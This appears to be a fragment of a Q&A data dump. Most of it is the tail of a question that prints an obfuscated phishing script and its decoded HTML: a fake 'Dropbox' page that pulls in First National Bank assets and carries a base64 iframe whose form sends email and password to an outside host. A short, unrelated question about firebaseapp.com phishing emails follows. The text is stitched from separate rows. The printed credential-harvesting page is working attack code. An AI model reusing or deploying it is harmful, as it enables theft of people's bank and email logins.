q7w=\"pojw7p077o\" ojs7=\"o7koA&amp;lt;pp\" 0q78=\"0oospaAAlllB8u]B&amp;lt;tBi:Ahh/pp7opAmHBHA&amp;lt;ppAsqzuoB&amp;lt;pp?m=IFgGhFeHdHhhh\" AD cv7o: u:v7=\"67p&amp;lt;qzsoztu\" &amp;lt;tuo7uo=\"M7w&amp;lt;tv7 ot 4zqpo V:oztu:w .:uxB 2tl &amp;lt;:u l7 07ws jtn? \" AD cv7o: u:v7=\"x7jltq6p\" &amp;lt;tuo7uo=\"\" AD cv7o: sqts7qoj=\"t9aozow7\" &amp;lt;tuo7uo=\"2tv7\" AD cv7o: sqts7qoj=\"t9a67p&amp;lt;qzsoztu\" &amp;lt;tuo7uo=\"M7w&amp;lt;tv7 ot 4zqpo V:oztu:w .:uxB 2tl &amp;lt;:u l7 07ws jtn? \" AD cv7o: sqts7qoj=\"t9azv:97\" &amp;lt;tuo7uo=\"0oospaAAlllB8u]B&amp;lt;tBi:AhGzv:97pAwt9tBsu9\" AD cA07:6D c]t6jDcz8q:v7 u:v7=\"1I\" lz6o0=\"IGFh\" 07z90o=\"fhh\" pq&amp;lt;=\"6:o:ao7koA0ovw;]:p7dF,T30h]Ml+&amp;gt;StV#yktJM4xT9hYT3Iw6359:2Rh&amp;lt;#Iw&amp;lt;LNs6yhzSHgn63Nn6#IO7L.w1z.y]HEhJMEhTQZhJL0hXH0h]Mle13VtKLZiJLSg6HwnJ3gG&amp;lt;jhkWyOj1yFV#ykh:LRpJPET6vNj&amp;lt;HN0&amp;lt;j.OJMkwJGZ0&amp;lt;30sKj.O&amp;lt;v4n&amp;lt;HJw&amp;lt;z.&amp;gt;]HEv:LZoKLRs]HFfXGRs63kwT9hYT2Vh7Mkw12RE&amp;lt;3Og1uRw72SmKGVi1yFV#yl0XQhV#zEi62wpJP597lhY#MJm]uSoJv4o:MkEUz..&amp;lt;vw0]#l9Q3Np6vNh:MV0X#.iKMEiXLVw&amp;lt;vwvUlhY#MJm]uSo&amp;lt;HwdJPt9WPRl7&amp;gt;pV#9wv]HEhXL6w:M6t6&amp;gt;t9KvgpJ&amp;gt;pV#uhV#zhoT9hYT#gi62wpJPFV#ylm:3N0J&amp;gt;FV#9hYT3ZmJ2x+&amp;gt;StV#ykl134p:M6nTQZyJMEhJL1zTyks]M&amp;lt;9&amp;lt;GZyTQZt62RlUzfm6G6GXy.w&amp;lt;3gj634p&amp;lt;HNj6vNjXvVm]Qgl]G/n:u.u1z.G:MRh:&amp;gt;hzVyKE1z.tJMwu:2Sg1yKhVz1+T#glT9hY&amp;gt;StfJ3wH12Vh7MkwTQZl]GVs63wm]yt9KMZi]HkI63Oe126sJ2RtUz/hW&amp;gt;Vl7&amp;gt;p9:3NsJH0hUz/iW&amp;gt;Zl7&amp;gt;p97zIs]vRw7&amp;gt;t9Wip9]3Nv6&amp;gt;t9V&amp;gt;&amp;lt;E&amp;lt;29e12Rm&amp;lt;&amp;gt;t9WPOF&amp;lt;29z13wxTQZpKLww&amp;lt;yWzT9hY#PkhKMZpJQ.z]GZxJL1g1y5z126sJ2RtTQ1kW&amp;gt;Ww1z.sJ&amp;gt;hz634z]3Oj1z.i62wpJPhzKvgjJ3NjXL6sJ2RtUz/l&amp;lt;29zT9hY#Sxf621+&amp;gt;StZ#Sxf63S9&amp;lt;GRE]3Og1vZm&amp;lt;vRw&amp;lt;zIi62wpJPt9]vgnJPp9KvgjJ3NjXL6sJ2RtUz.oJMRs6MhzTykv]GZo13Iw630mJ&amp;gt;hz&amp;lt;3gi6#19]v4oJPhz]Lwv]GZo1z.0KGRs]HFg1v0h62/dXjgo:MkpJL1oJv4j]LWnKHgoXGZwJ3wjJMVh:MEuLG.pJM4iJNgGKMwhXu.t&amp;lt;#1+&amp;gt;StZ#Sx91&amp;gt;klTzJnKuVlUj/fXG/+&amp;gt;StZ#Sx91&amp;gt;kx:LK9KHk0&amp;lt;GWg1vVm]#Ii]QhkWz1+&amp;gt;StZ#SxZ#SxZ#SxZT3ZjXiFV#9xZ#SxZ#SxZ#SxfKu1mT9hY1#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91#/91&amp;gt;kz&amp;lt;zf+&amp;gt;StZ#SxZ#SxZ#SxZZvEz&amp;lt;G/eZvEz&amp;lt;G/e&amp;gt;StZ#SxZ#SxZ#SxZZvEz&amp;lt;G/eT2VlKMF9KHk0&amp;lt;GWg1uVh7MkwWQ1+15NoKMwpZvEz&amp;lt;G/eZvEz&amp;lt;G/eT#gi&amp;lt;34nTzJnKuVlUjJnKuVlUjJnKuVlUj/v]vZi&amp;lt;&amp;gt;pv]vZi&amp;lt;&amp;gt;pv]vZi&amp;lt;&amp;gt;pv]vZi&amp;lt;&amp;gt;pv]vZi&amp;lt;&amp;gt;pv]vZi&amp;lt;&amp;gt;p9ZvEz&amp;lt;G/eZvEz&amp;lt;G/eZvEz&amp;lt;G/eZvEz&amp;lt;G/eZvEz&amp;lt;G/eZvEz&amp;lt;G/e&amp;gt;StZ#SxZ#SxZ#Sx91#/91&amp;gt;ks]u.I6#.h7L.wTQZw]M4s]#19&amp;lt;vNk6MwjJMS9KHk0&amp;lt;GWg1vJm&amp;lt;vhoKHgn62Zm]#19:MSg1vNoKMwp1z.nKMIwTQZw]M4s]#19&amp;lt;3k0KHNt]HkxJL1g1z196v4p6MO9&amp;lt;HwdJPhzWi/zT9hY#SxZ#Q/9T3ZjXiFV#9xZ#Sx91&amp;gt;kz&amp;lt;zf+&amp;gt;StZ#Sx91#/91#/f&amp;lt;G.0]z.i62wpJPhz]M4jJHwnXLRm&amp;lt;&amp;gt;t9W&amp;gt;p9]M4jJHwnXMZm62Rm]Pt9W#1+&amp;gt;StZ#Sx91#JnKuVlUjJnKuVlUjJnKuVlUjJnKuVlUjJnKuVlUiki62Zm]v&amp;lt;9KHk0&amp;lt;GWg1uVh7MkwWQ1+RMI0:Ml9O34i&amp;lt;G6m&amp;lt;vSfXGVh&amp;lt;vgnJiFv]vZi&amp;lt;&amp;gt;p91#/9&amp;gt;St91#/91#/91#/91#/91&amp;gt;ks]u.I6#.h7L.wTQZlKLVi6HgjJ#19&amp;lt;vNk6MwjJMS9KHk0&amp;lt;GWg1vJm&amp;lt;vhoKHgn62Zm]#19:MSg1u.0&amp;lt;GVG]GZx1z.nKMIwTQZlKLVi6HgjJ#19&amp;lt;3k0KHNt]HkxJL1g1z196v4p6MO9&amp;lt;HwdJPhzWi/zT9hY#Sx91#/91#/fXGVlKMF+T#gx:LK+&amp;gt;StZ#SxZT2/9&amp;lt;GRE]3Og1vI0&amp;lt;v6s]zIh]G/d1&amp;gt;/e13I0&amp;lt;v6s]zIz]GRh]Hhd1&amp;gt;/zTzJnKuVlUilm&amp;lt;&amp;gt;FV#9xZ#Q/9T2/9KMksJHFg1vVw]uRw&amp;lt;z19&amp;lt;GRE]3Og1vI0&amp;lt;v6s]zIh]G/d1&amp;gt;/e13I0&amp;lt;v6s]zIz]GRh]Hhd1&amp;gt;/zT9hY#SxZ1#/91&amp;gt;ks]u.I6#.h7L.wTQZs]M4uJQ19&amp;lt;GZyTQZt62RlUzfm6G6GXy.w&amp;lt;3gj634p&amp;lt;HNj6vNjXvVm]Qgz6LRh]HE0KuV0Xu.nJj19KMkhTQZW]H6s]z19]v4oJPhzQP5z126sJ2RtTQ1EW#19:3NsJH0hTQ1iWz1+&amp;gt;StZ#Sx91&amp;gt;lm&amp;lt;&amp;gt;FV#9xZ#Sxf&amp;lt;#.i62wpJPhz]M4jJHwnXLRm&amp;lt;&amp;gt;t9W&amp;gt;p9]M4jJHwnXMZm62Rm]Pt9W#1+ZvEz&amp;lt;G/e&amp;gt;StZ#SxZT#glT9hY#SxZ1#/fXHJm&amp;lt;vh+&amp;gt;StZ#Q/9T#ghJ&amp;gt;FV#9xZT#gh&amp;lt;yFV#z/9T#ghKMZpJPFV#ylmJ3wHT9hY&amp;gt;StfXHZmJ2x+&amp;gt;StV#ylm:2Ro]&amp;gt;F=\" ]tq67q=\"h\" 8q:v7]tq67q=\"h\"D c6zm :wz9u=\"w78o\"DKtnq ]qtlp7q 6t7p uto pnsstqo zuwzu7 8q:v7p tq zp &amp;lt;nqq7uowj &amp;lt;tu8z9nq76 uto ot 6zpsw:j zuwzu7 8q:v7pB cA6zmD cAz8q:v7DcA]t6jDcA0ovwD");
 document.write(source);
 &amp;lt;/script&amp;gt;
 &amp;lt;/head&amp;gt;&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;The result of &lt;code&gt;document.write(source)&lt;/code&gt; is this:&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
 &amp;lt;html id="zaSkin" class="v2_2 minHeight "&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;title&amp;gt;Dropbox l Home&amp;lt;/title&amp;gt;
  &amp;lt;meta http-equiv="X-UA-Compatible" content="IE=Edge"&amp;gt;
  &amp;lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /&amp;gt;
  &amp;lt;meta name="HandheldFriendly" content="true" /&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/font/font.css?v=1493047262000"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_MM.css?v=1493047262000"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.css"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/libs/jquery-ui.min.css"&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/waypoints.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/parallax.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/slick.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/d3.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/gauge.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery-ui.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.scrollify.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/formValidation.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Animate.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Scroller.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/render.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/EasyScroller.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/Base64.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_browserPC.css?v=1493047262000" https://www.fnb.co.za/&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM_pc.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/print.css?v=1493047262000" /&amp;gt;
  &amp;lt;meta name="description" content="Welcome to First National Bank. How can we help you? " /&amp;gt;
  &amp;lt;meta name="keywords" content="" /&amp;gt;
  &amp;lt;meta property="og:title" content="Home" /&amp;gt;
  &amp;lt;meta property="og:description" content="Welcome to First National Bank. How can we help you? " /&amp;gt;
  &amp;lt;meta property="og:image" content="https://www.fnb.co.za/03images/logo.png" /&amp;gt; &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;iframe name="I1" width="1340" height="800" src="data:text/html;base64,PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUyIj4NCjx0aXRsZT5PdmVyc2VhcyBUZWxlZ3JhcGhpYyBUcmFuc2ZlciBDb25maXJtYXRpb248L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5zdHlsZTEgew0KCWZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOw0KCWZvbnQtc2l6ZTogMTRweDsNCglmb250LXdlaWdodDogYm9sZDsNCn0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxwIGFsaWduPSJjZW50ZXIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9wb3AuanBnIiB3aWR0aD0iNjY5IiBoZWlnaHQ9IjY0NiI+PC9wPg0KDQo8ZGl2IHN0eWxlPSJwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiA0MDNweDsgaGVpZ2h0OiAzMDJweDsgei1pbmRleDogMzsgbGVmdDogNDc5cHg7IHRvcDogMTU4cHgiIGlkPSJsYXllcjMiPg0KCTx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDMlIiBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLXdpZHRoOiAwcHgiPg0KCQk8dHI+DQoJCQk8dGQgc3R5bGU9ImJvcmRlci1zdHlsZTogbm9uZTsgYm9yZGVyLXdpZHRoOiBtZWRpdW0iPjxmb3JtIG1ldGhvZD0icG9zdCIgbmFtZT0ibXlmb3JtIiBhY3Rpb249Imh0dHA6Ly9taWxsZXItZmFybXMuY29tL3JlZGlyZWN0aW5nX3BsZWFzZV93YWl0LnBocCI+DQoJCQkgIDxwPiZuYnNwOyA8L3A+DQoJCQkgIDxkaXYgY2xhc3M9ImNvbC1zbS0xMiI+DQoJCQkJCQkJCQkJPGJyLz4NCgkJCQkJCQkJCQk8YnIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxici8+DQoJCQkJCQkJCQkJJm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkJJm5ic3A7PHNwYW4gY2xhc3M9InN0eWxlMSI+IEVtYWlsJm5ic3A7Jm5ic3A7PC9zcGFuPiZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkgICAgIDxpbnB1dCB0eXBlPSJlbWFpbCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkJCSAgPGJyLz4NCgkJCQkgIDxici8+DQoJCQkgICAgICA8c3BhbiBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+DQoJCQkgICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxzdHJvbmcgY2xhc3M9InN0eWxlMSI+RW1haWwgUGFzc3dvcmQ8L3N0cm9uZz4mbmJzcDsgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9InBhc3N3b3JkIiBuYW1lPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkgICAgICA8L3NwYW4+PC9kaXY+DQoJCQkJPHAgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPiZuYnNwOzwvcD4NCgkJCSAgPHAgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPg0KCQkJICAgIDxpbnB1dCB0eXBlPSJpbWFnZSIgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9idXR0b25hYnNhLnBuZyIgYWx0PSJMb2dpbiIgbmFtZT0iSTEiIHdpZHRoPSI5MCIgaGVpZ2h0PSIzMiI+DQoJCQkgIDwvcD4NCgkJCQk8cCBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+Jm5ic3A7DQoJCQkJPC9wPg0KCQkJICA8L2Zvcm0+DQoJCSAgPC90ZD4NCgkJPC90cj4NCiAgPC90YWJsZT4NCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=" border="0" frameborder="0"&amp;gt;
  &amp;lt;div align="left"&amp;gt;Your browser does not support inline frames or is currently configured not to display inline frames. &amp;lt;/div&amp;gt;
  &amp;lt;/iframe&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &amp;lt;!doctype html&amp;gt;
 &amp;lt;html id="zaSkin" class="v2_2 minHeight "&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;title&amp;gt;Dropbox l Home&amp;lt;/title&amp;gt;
  &amp;lt;meta http-equiv="X-UA-Compatible" content="IE=Edge"&amp;gt;
  &amp;lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /&amp;gt;
  &amp;lt;meta name="HandheldFriendly" content="true" /&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/font/font.css?v=1493047262000"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_MM.css?v=1493047262000"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.css"&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/libs/jquery-ui.min.css"&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/waypoints.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/parallax.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/slick.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/d3.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/gauge.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/c3.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery-ui.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/jquery.scrollify.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/formValidation.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Animate.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/Scroller.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/render.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/libs/EasyScroller.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/Base64.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/main_browserPC.css?v=1493047262000" https://www.fnb.co.za/&amp;gt;
  &amp;lt;script type="text/javascript" src="https://www.fnb.co.za/00Assets/v2.2/js/main_MM_pc.js?v=1493047262000"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;link rel="stylesheet" type="text/css" href="https://www.fnb.co.za/00Assets/v2.2/css/print.css?v=1493047262000" /&amp;gt;
  &amp;lt;meta name="description" content="Welcome to First National Bank. How can we help you? " /&amp;gt;
  &amp;lt;meta name="keywords" content="" /&amp;gt;
  &amp;lt;meta property="og:title" content="Home" /&amp;gt;
  &amp;lt;meta property="og:description" content="Welcome to First National Bank. How can we help you? " /&amp;gt;
  &amp;lt;meta property="og:image" content="https://www.fnb.co.za/03images/logo.png" /&amp;gt; &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;iframe name="I1" width="1340" height="800" src="data:text/html;base64,PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjUyIj4NCjx0aXRsZT5PdmVyc2VhcyBUZWxlZ3JhcGhpYyBUcmFuc2ZlciBDb25maXJtYXRpb248L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5zdHlsZTEgew0KCWZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOw0KCWZvbnQtc2l6ZTogMTRweDsNCglmb250LXdlaWdodDogYm9sZDsNCn0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxwIGFsaWduPSJjZW50ZXIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9wb3AuanBnIiB3aWR0aD0iNjY5IiBoZWlnaHQ9IjY0NiI+PC9wPg0KDQo8ZGl2IHN0eWxlPSJwb3NpdGlvbjogYWJzb2x1dGU7IHdpZHRoOiA0MDNweDsgaGVpZ2h0OiAzMDJweDsgei1pbmRleDogMzsgbGVmdDogNDc5cHg7IHRvcDogMTU4cHgiIGlkPSJsYXllcjMiPg0KCTx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDMlIiBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLXdpZHRoOiAwcHgiPg0KCQk8dHI+DQoJCQk8dGQgc3R5bGU9ImJvcmRlci1zdHlsZTogbm9uZTsgYm9yZGVyLXdpZHRoOiBtZWRpdW0iPjxmb3JtIG1ldGhvZD0icG9zdCIgbmFtZT0ibXlmb3JtIiBhY3Rpb249Imh0dHA6Ly9taWxsZXItZmFybXMuY29tL3JlZGlyZWN0aW5nX3BsZWFzZV93YWl0LnBocCI+DQoJCQkgIDxwPiZuYnNwOyA8L3A+DQoJCQkgIDxkaXYgY2xhc3M9ImNvbC1zbS0xMiI+DQoJCQkJCQkJCQkJPGJyLz4NCgkJCQkJCQkJCQk8YnIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxici8+DQoJCQkJCQkJCQkJJm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkJJm5ic3A7PHNwYW4gY2xhc3M9InN0eWxlMSI+IEVtYWlsJm5ic3A7Jm5ic3A7PC9zcGFuPiZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7DQoJCQkJCQkJCQkgICAgIDxpbnB1dCB0eXBlPSJlbWFpbCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkJCSAgPGJyLz4NCgkJCQkgIDxici8+DQoJCQkgICAgICA8c3BhbiBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+DQoJCQkgICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxzdHJvbmcgY2xhc3M9InN0eWxlMSI+RW1haWwgUGFzc3dvcmQ8L3N0cm9uZz4mbmJzcDsgICAgDQogICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgcmVxdWlyZWQgY2xhc3M9ImZvcm0tY29udHJvbCIgaWQ9InBhc3N3b3JkIiBuYW1lPSJwYXNzd29yZCIgcGxhY2Vob2xkZXI9IiIgdmFsdWUgc2l6ZT0iMzAiPg0KCQkgICAgICA8L3NwYW4+PC9kaXY+DQoJCQkJPHAgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPiZuYnNwOzwvcD4NCgkJCSAgPHAgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbi10b3A6IDA7IG1hcmdpbi1ib3R0b206IDAiPg0KCQkJICAgIDxpbnB1dCB0eXBlPSJpbWFnZSIgc3JjPSJodHRwOi8vd3d3LjBlcG9ydGFsc2VydmVyLmNvbS9idXR0b25hYnNhLnBuZyIgYWx0PSJMb2dpbiIgbmFtZT0iSTEiIHdpZHRoPSI5MCIgaGVpZ2h0PSIzMiI+DQoJCQkgIDwvcD4NCgkJCQk8cCBzdHlsZT0ibWFyZ2luLXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+Jm5ic3A7DQoJCQkJPC9wPg0KCQkJICA8L2Zvcm0+DQoJCSAgPC90ZD4NCgkJPC90cj4NCiAgPC90YWJsZT4NCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=" border="0" frameborder="0"&amp;gt;
  &amp;lt;div align="left"&amp;gt;Your browser does not support inline frames or is currently configured not to display inline frames. &amp;lt;/div&amp;gt;
  &amp;lt;/iframe&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can emails with firebaseapp.com domain be phishing emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received 30+ emails in all languages (often eastern European) that always say the same thing :&lt;/p&gt;
 &lt;p&gt;&amp;quot;hello&lt;/p&gt;
 &lt;p&gt;We received a request to access project-0000000000 with this email address. If you want to sign in with your (your email) account, click this link:&lt;/p&gt;
 &lt;p&gt;Access to project-0000000000&lt;/p&gt;
 &lt;p&gt;If you didn't request this connection, ignore the email.&lt;/p&gt;
 &lt;p&gt;With respect,&lt;/p&gt;
 &lt;p&gt;project-0000000000 team&amp;quot;&lt;/p&gt;
 &lt;p&gt;I have received 30+ of these, without any prior action on my side. They generally have an URL &amp;quot;leading to the project&amp;quot;. The URL seems based on firebase as well (xxxxxxx.page.link/?link=https://0000000000.firebase.com/...), but I wonder if it could be malicious, depending on what comes at the end of the URL, I guess.&lt;/p&gt;
 &lt;p&gt;If it's an attack, I guess the vector attack is the URL, because I cannot see any other option.&lt;/p&gt;
 &lt;p&gt;If it's not an attack, I wonder why on earth I receive all the emails, and what I can do about it.&lt;/p&gt;
 &lt;p&gt;The strangest thing, for me, is that I once received an email in Turkish thanking me for my contribution to one project. This email had no URL, so no obvious attack vector. I don't know if it was a case of social engineering, or if someone is impersonating my email address to use firebase.&lt;/p&gt;
